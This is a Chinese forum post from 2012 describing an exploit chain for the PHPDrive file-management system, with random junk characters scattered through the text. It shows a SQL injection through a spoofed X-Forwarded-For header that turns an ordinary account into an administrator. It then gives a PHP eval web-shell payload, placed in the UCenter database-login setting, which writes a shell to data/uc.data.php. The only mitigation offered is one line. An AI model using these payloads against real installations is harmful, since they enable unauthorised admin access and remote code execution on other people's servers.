PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
+ j: q, L" _$ r: z+ F1 t+ P3 M. _9 Q" ~; Q2 I2 `! s5 a( l& p; T
includes/user.lib.php" w" f7 H) A" T# p/ W
行879 f" {# A8 T0 S U, u4 A, E
function get_ip() {# D- c$ U5 k2 d* m# d+ \
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.. e3 t3 L$ {- x3 l( a" l
在用户注册与登录 处module/disk/account.lead.php0 T) e5 b, U8 r( r" k
198行 ( P0 N) O5 d/ c; `; Y& Q, V v% i" t
//更新本次登录IP和时间 F: W. d M& U* Y: @
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生/ l2 m8 k+ d- e/ S9 s" q2 ^) f
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
, _9 i4 j5 v( J) x实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.8 S( j) M/ O) @0 T. K$ b. |5 u9 D+ u
后台getshell:
9 ^4 u- k& q9 w' n4 `+ o% [( Y在UCenter设置处,将UC数据库登录名填写为3 V W3 P% O# n2 F" q5 T
/ s2 ` Z ]% @, f7 A! ?# f! H$ G m
root’);eval($_POST[DisKill]);?>/*
' }$ s( q" ^% G5 O( i7 g可以得到一个shell,位置在 data/uc.data.php
% d- k! u3 U" n# H' I* z" _3 Y9 z$ O( J4 X/ L: j3 w
修复:过滤注入/ Y! |1 a# {; T8 i! V0 A! c: [
4 N% d! x+ {* z, Y8 O \. ^! T
|
发表于 2012-12-31 09:18:34
收藏
支持
反对